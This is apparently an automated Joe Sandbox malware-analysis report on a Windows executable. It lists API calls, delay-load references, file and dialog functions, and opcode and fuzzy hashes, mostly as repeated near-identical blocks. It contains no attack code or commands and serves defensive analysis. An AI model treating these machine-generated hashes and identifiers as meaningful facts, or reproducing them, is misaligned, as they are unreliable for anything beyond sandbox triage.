                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 147dcfcbc8fad536e13008aea3c4023b63337bf97ab11056e8b536a8c9d83167
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 147dcfcbc8fad536e13008aea3c4023b63337bf97ab11056e8b536a8c9d83167
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 8c2e5421515c39cd7c4af4ade0e61756c1029751402db14f3c35bb25268e41af
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 8c2e5421515c39cd7c4af4ade0e61756c1029751402db14f3c35bb25268e41af
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 04988bf0ac7e501ed366c7dac0bd678c2017f7e64f3b2813ad80282422188e21
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 04988bf0ac7e501ed366c7dac0bd678c2017f7e64f3b2813ad80282422188e21
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E1E3
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 96f3e84dbc6d3967735b2029dc05de2a20944d71702e3dc54dd9a1b8395150f5
                                                                                            • Instruction ID: 768b484c708879457d92845099bfc0362f438cc2b851d410559e7a23412f878d
                                                                                            • Opcode Fuzzy Hash: 96f3e84dbc6d3967735b2029dc05de2a20944d71702e3dc54dd9a1b8395150f5
                                                                                            • Instruction Fuzzy Hash: 1BA001EA2E9142BC7548A6566E06C3B062DE4D9B613308A2EF857C4481A99078451971
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 5a2242482ab769626f2214bc880ede8eb2c0885cdd6f5355c6a7cbff2bebcc3c
                                                                                            • Instruction ID: 8424fbc7cc530afbc2fff16140771837df33426fae634f152a3dabfe8bf3e303
                                                                                            • Opcode Fuzzy Hash: 5a2242482ab769626f2214bc880ede8eb2c0885cdd6f5355c6a7cbff2bebcc3c
                                                                                            • Instruction Fuzzy Hash: 80A001FE2A95527D7509EA51AE06C3B022DE4C1B25330A92EF866A9481AC8028451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: a61fcb3c5cab9d7f2e054e76bdded14f58c2e84c674a9b072fe886000468aa3b
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: a61fcb3c5cab9d7f2e054e76bdded14f58c2e84c674a9b072fe886000468aa3b
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: f440f2b7712c00c6b8113a34535a74d25ef8f887cf476731cdc97af040f92822
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: f440f2b7712c00c6b8113a34535a74d25ef8f887cf476731cdc97af040f92822
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 2e83e69f484ddf1db4dffd34a76f0df3c4c766b5a091a3e507e948bae5a2fd24
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: 2e83e69f484ddf1db4dffd34a76f0df3c4c766b5a091a3e507e948bae5a2fd24
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 0b61b5817652119362f8b5181e867c7cc687034dcb8103d514420ff8b87648d3
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: 0b61b5817652119362f8b5181e867c7cc687034dcb8103d514420ff8b87648d3
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E3FC
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 5b3f2243a5fdf33d36743bf67babbf5af98ce0cb96d6494f990f985cbcb25c99
                                                                                            • Instruction ID: 4aa8816bdc30b09b95a88f419ece9bf2f1a4ff99b6a3c2717c3f215199d2370b
                                                                                            • Opcode Fuzzy Hash: 5b3f2243a5fdf33d36743bf67babbf5af98ce0cb96d6494f990f985cbcb25c99
                                                                                            • Instruction Fuzzy Hash: 3FA001FE2A9552BC7509EA51AE06C3B022DE4C5B61330A92EF86699481A88028451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 4944013ea54ed9e156c06fff26d35c5ae053e5c9153e1105d2eaa9ea1978e0dd
                                                                                            • Instruction ID: 4c2e31887aaa4e1e194232543c802cf9197acf308eea37306977886ea74cdba9
                                                                                            • Opcode Fuzzy Hash: 4944013ea54ed9e156c06fff26d35c5ae053e5c9153e1105d2eaa9ea1978e0dd
                                                                                            • Instruction Fuzzy Hash: 0EA011EE2AA002BC3008A2A0AE02C3B022CE0C0B20330AA2EF80280080A88008000832
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: f1be50d6d153254c7dfe3c660f2ac873751ac46d0b35fd1a8ceb76668f134aba
                                                                                            • Instruction ID: 4c2e31887aaa4e1e194232543c802cf9197acf308eea37306977886ea74cdba9
                                                                                            • Opcode Fuzzy Hash: f1be50d6d153254c7dfe3c660f2ac873751ac46d0b35fd1a8ceb76668f134aba
                                                                                            • Instruction Fuzzy Hash: 0EA011EE2AA002BC3008A2A0AE02C3B022CE0C0B20330AA2EF80280080A88008000832
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 2cfc5550a065e36e365258a9776644410d69468ba56811d5c5054dc9227d8228
                                                                                            • Instruction ID: a05bd30e01f422110175cfab7a3fe8b4dbe6f058198943dd62a27db864233eb8
                                                                                            • Opcode Fuzzy Hash: 2cfc5550a065e36e365258a9776644410d69468ba56811d5c5054dc9227d8228
                                                                                            • Instruction Fuzzy Hash: 45A001EEAA9542BC7908A656AE06C3B462DE8C6F65370A92EF85784481A8801C451976
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: bfb624c8b08d93f991aeb27da6f7eaf702a2679625472a466e2be0ef5771dbf9
                                                                                            • Instruction ID: be07c0c3af1ef4486737e121a5296ea59dacbe432a610d4a293204c1188973cb
                                                                                            • Opcode Fuzzy Hash: bfb624c8b08d93f991aeb27da6f7eaf702a2679625472a466e2be0ef5771dbf9
                                                                                            • Instruction Fuzzy Hash: 71A011EE2AA0003C3008A2A0AE02C3B022CE0C0B22330AA2EF80280080A8800A000832
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNELBASE(?,00A3903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00A39F0C
                                                                                            Similarity
                                                                                            • API ID: File
                                                                                            • String ID:
                                                                                            • API String ID: 749574446-0
                                                                                            APIs
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00A4AE72,C:\Users\user\Desktop,00000000,00A7946A,00000006), ref: 00A4AC08
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(000000FF,?,?,00A395D6,?,?,?,?,?,00A62641,000000FF), ref: 00A3963B
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A4C2B1
                                                                                            • EndDialog.USER32(?,00000006), ref: 00A4C2C4
                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 00A4C2E0
                                                                                            • SetFocus.USER32(00000000), ref: 00A4C2E7
                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A4C321
                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A4C358
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00A4C36E
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A4C38C
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A4C39C
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A4C3B8
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A4C3D4
                                                                                            • _swprintf.LIBCMT ref: 00A4C404
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A4C417
                                                                                            • FindClose.KERNEL32(00000000), ref: 00A4C41E
                                                                                            • _swprintf.LIBCMT ref: 00A4C477
                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A4C48A
                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A4C4A7
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A4C4C7
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A4C4D7
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A4C4F1
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A4C509
                                                                                            • _swprintf.LIBCMT ref: 00A4C535
                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A4C548
                                                                                            • _swprintf.LIBCMT ref: 00A4C59C
                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A4C5AF
                                                                                              • Part of subcall function 00A4AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A4AF35
                                                                                              • Part of subcall function 00A4AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6E72C,?,?), ref: 00A4AF84
                                                                                            Similarity
                                                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                            • API String ID: 797121971-1840816070
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A36FAA
                                                                                            • _wcslen.LIBCMT ref: 00A37013
                                                                                            • _wcslen.LIBCMT ref: 00A37084
                                                                                              • Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
                                                                                              • Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
                                                                                              • Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00
                                                                                              • Part of subcall function 00A3A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641,000000FF), ref: 00A3A1F1
                                                                                              • Part of subcall function 00A3A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641), ref: 00A3A21F
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A37139
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A37155
                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A37298
                                                                                              • Part of subcall function 00A39DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A373BC,?,?,?,00000000), ref: 00A39DBC
                                                                                              • Part of subcall function 00A39DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00A39E70
                                                                                              • Part of subcall function 00A39620: CloseHandle.KERNELBASE(000000FF,?,?,00A395D6,?,?,?,?,?,00A62641,000000FF), ref: 00A3963B
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                            • API String ID: 3983180755-3508440684
                                                                                            • Opcode ID: 4c0771510650aaff35ffd27e0a3ef0b399a46694d9a39ccce6d748ee666a7bcc
                                                                                            • Instruction ID: d269c5113b13d6ac4729114a0424bc359a5e9d39a63de02bffb7a1b07e1b2570
                                                                                            • Opcode Fuzzy Hash: 4c0771510650aaff35ffd27e0a3ef0b399a46694d9a39ccce6d748ee666a7bcc
                                                                                            • Instruction Fuzzy Hash: 9DC1E6B1D04648AADB35DBB4DD82FEEB3B8BF04300F008559F956E7182D774AA49CB61
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
